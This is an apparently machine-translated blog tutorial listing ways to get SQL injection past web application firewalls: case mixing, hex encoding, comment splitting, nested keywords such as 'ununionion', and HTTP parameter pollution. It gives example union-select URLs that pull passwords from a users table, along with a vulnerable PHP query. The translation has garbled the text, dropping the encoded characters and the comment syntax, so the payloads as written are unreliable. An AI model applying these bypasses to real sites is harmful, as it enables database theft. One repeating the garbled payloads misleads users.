Let's see how cool men break through WAF defense (1)

After all the system security defenses are completed, I am afraid SQL injection, cross-site attacks, and other web Application Layer defenses are left behind. This is also the most troublesome thing for the majority of webmasters, A few days ago, I wrote "Security treasure architecture technology speculation and advanced network security defense" to explain the simplest high-performance defense method, which can be slightly modified based on my own situation, we can deal with most of the attacks, but is everything okay?

First, let's review how the online cool man broke through waf defense:

1. case-insensitive Bypass

Everyone is familiar with this. It has a significant effect on some too-junk WAF. For example, if union is intercepted, UnionUnIoN will be used to bypass it.

2. Simple code Bypass

For example, if the WAF keyword is detected, we can make it impossible to detect it. For example, if union is detected, we use U, which is the hexadecimal encoding of U, instead of U. union is written as UnION, and some WAF can be bypassed in combination with Case sensitivity, you can replace one or more of them at will.

In addition, during Mysql injection, for example, when the table name or load file is used, the file name or representation is used to bypass WAF in hexadecimal encoding.

3. annotation Bypass

This case is rare. WAF only filters out a dangerous statement and does not block our entire query.

01 ./? Id = 1 + union + select + 1, 2, 3 unionselect + 1, 2, 3, 3...

As you can see, as long as we put the sensitive word in the comment, note that we need to add one before!

4. Separated rewrite Bypass

The above example is applicable to the situation where WAF uses regular expressions and detects all sensitive words, regardless of where you write them. If you have a few words, filter them.

We can separate sensitive words through annotations, so that the WAF regular expression does not work, but the query results are not affected.

01 ./? Id = 1 + union + select + 1, 2, 3 --

As for rewrite bypass, it is applicable to scenarios where WAF filters once. Like the principle of uploading aaspsp horse, we can write something similar to Ununionion. After filtering a union operation, our query will be executed.

01 .? Id = 1ununionionselect1, 2, 3 --

5. Http parameter contamination (HPP)

For example, we have the following statement:

01 ./? Id = 1 unionselect + 1, 2, 3 + from + users + where + id = 1 --

We can repeat the previous id value and add our value to bypass it. & id = will become a comma during query:

01 ./? Id = 1 unionselect + 1 & id = 2, 3 + from + users + where + id = 1 --

There are many conditions for success in this case, depending on the specific WAF implementation.

An example is provided to illustrate the usage:

01 ./? Id = 1unionselectpwdfromusers --

The specific analysis involves compiling the background code of the query statement.

For example, the server writes:

01. select * fromtablewherea = ". $ _ GET ['a']. "andb = ". $ _ GET ['B']. "limit ". $ _ GET ['C'];

Then we can construct the following injection statement:

01 ./? A = 1 + unionselect + 1, passfrom + users --

The final Parsing is as follows:

01. select * fromtablewherea = 1unionselect1, passfromusers --

As you can see, this method is more suitable for white box testing, while black box penetration is troublesome to use. But you can try it.